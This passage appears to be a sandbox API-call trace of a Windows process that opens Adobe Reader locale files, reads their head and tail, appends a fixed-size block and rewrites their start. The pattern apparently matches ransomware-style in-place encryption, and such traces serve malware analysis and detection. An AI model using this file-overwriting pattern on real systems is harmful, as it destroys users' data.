(lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\EScript.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\escript.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0078.731] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0078.731] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x9e00 [0078.731] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0078.731] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0078.731] ReleaseMutex (hMutex=0x168) returned 1 [0078.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.DAN", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0078.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.DAN", cchWideChar=11, lpMultiByteStr=0x1f7320c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EScript.DAN", lpUsedDefaultChar=0x0) returned 11 [0078.731] ReadFile (in: hFile=0x1dc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0078.748] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x8e00 [0078.748] ReadFile (in: hFile=0x1dc, lpBuffer=0x25ad0d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25ad0d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0078.790] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x8e00 [0078.790] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0078.791] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0078.791] WriteFile (in: hFile=0x1dc, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0078.792] CloseHandle (hObject=0x1dc) returned 1 [0078.867] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\reflow.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\reflow.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0078.868] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0078.869] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x1200 [0078.869] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0078.869] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0078.869] ReleaseMutex (hMutex=0x168) returned 1 [0078.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reflow.DAN", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0078.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reflow.DAN", cchWideChar=10, lpMultiByteStr=0x1f735ec, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="reflow.DAN", lpUsedDefaultChar=0x0) returned 10 [0078.869] ReadFile (in: hFile=0x1cc, lpBuffer=0x25aa078, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25aa078*, lpNumberOfBytesRead=0x359f2bc*=0x1200, lpOverlapped=0x0) returned 1 [0079.062] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0079.063] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1788, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x359f2d0*=0x1788, lpOverlapped=0x0) returned 1 [0079.063] CloseHandle (hObject=0x1cc) returned 1 [0079.063] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Weblink.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\weblink.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0079.065] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0079.065] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x6e00 [0079.065] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0079.065] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.065] ReleaseMutex (hMutex=0x168) returned 1 [0079.065] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Weblink.DAN", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0079.065] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Weblink.DAN", cchWideChar=11, lpMultiByteStr=0x1f732cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Weblink.DAN", lpUsedDefaultChar=0x0) returned 11 [0079.065] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.079] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x5e00 [0079.079] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.082] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x5e00 [0079.083] WriteFile (in: hFile=0x1cc, lpBuffer=0x25ac078*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ac078*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.083] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0079.084] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0079.084] CloseHandle (hObject=0x1cc) returned 1 [0079.084] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\DVA.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\dva.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0079.086] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0079.086] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x4c00 [0079.086] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0079.086] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.086] ReleaseMutex (hMutex=0x168) returned 1 [0079.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.DEU", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0079.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.DEU", cchWideChar=7, lpMultiByteStr=0x1f7ab7c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DVA.DEU", lpUsedDefaultChar=0x0) returned 7 [0079.087] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.088] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x3c00 [0079.088] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.089] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x3c00 [0079.089] WriteFile (in: hFile=0x1cc, lpBuffer=0x2866a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866a88*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.090] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0079.090] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0079.090] CloseHandle (hObject=0x1cc) returned 1 [0079.091] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\RdLang32.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\rdlang32.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0079.092] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0079.092] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x15c400 [0079.092] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0079.092] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.092] ReleaseMutex (hMutex=0x168) returned 1 [0079.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.DEU", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.DEU", cchWideChar=12, lpMultiByteStr=0x1f733cc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RdLang32.DEU", lpUsedDefaultChar=0x0) returned 12 [0079.093] ReadFile (in: hFile=0x1cc, lpBuffer=0x288ade8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0079.104] ReadFile (in: hFile=0x1cc, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.113] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x15b400 [0079.113] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.128] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x15b400 [0079.129] WriteFile (in: hFile=0x1cc, lpBuffer=0x26696c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x26696c8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.129] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0079.129] WriteFile (in: hFile=0x1cc, lpBuffer=0x289ae18*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x289ae18*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0079.130] WriteFile (in: hFile=0x1cc, lpBuffer=0x289ae18*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x289ae18*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0079.130] CloseHandle (hObject=0x1cc) returned 1 [0079.130] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\Spelling.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\spelling.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0079.139] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0079.139] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x2a00 [0079.139] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0079.139] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.139] ReleaseMutex (hMutex=0x168) returned 1 [0079.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.DEU", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.DEU", cchWideChar=12, lpMultiByteStr=0x1f7352c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Spelling.DEU", lpUsedDefaultChar=0x0) returned 12 [0079.140] ReadFile (in: hFile=0x1cc, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.148] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1a00 [0079.148] ReadFile (in: hFile=0x1cc, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.164] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1a00 [0079.164] WriteFile (in: hFile=0x1cc, lpBuffer=0x2696c48*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2696c48*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.165] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0079.165] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e955a8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e955a8*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0079.165] CloseHandle (hObject=0x1cc) returned 1 [0079.165] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Checkers.ESP" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\es_es\\checkers.esp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0079.166] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0079.166] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x1fc00 [0079.166] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0079.166] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.166] ReleaseMutex (hMutex=0x168) returned 1 [0079.167] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.ESP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.167] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.ESP", cchWideChar=12, lpMultiByteStr=0x1f7366c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Checkers.ESP", lpUsedDefaultChar=0x0) returned 12 [0079.167] ReadFile (in: hFile=0x1cc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0079.179] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1ec00 [0079.179] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.326] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1ec00 [0079.326] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.327] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0079.327] WriteFile (in: hFile=0x1cc, lpBuffer=0x2665668*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665668*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0079.327] CloseHandle (hObject=0x1cc) returned 1 [0079.328] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\pddom.ESP" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\es_es\\pddom.esp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0079.328] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0079.328] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x2c00 [0079.328] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0079.329] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.330] ReleaseMutex (hMutex=0x168) returned 1 [0079.330] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pddom.ESP", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0079.330] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pddom.ESP", cchWideChar=9, lpMultiByteStr=0x1f732cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pddom.ESP", lpUsedDefaultChar=0x0) returned 9 [0079.330] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.343] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1c00 [0079.343] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.349] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1c00 [0079.349] WriteFile (in: hFile=0x1cc, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.350] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 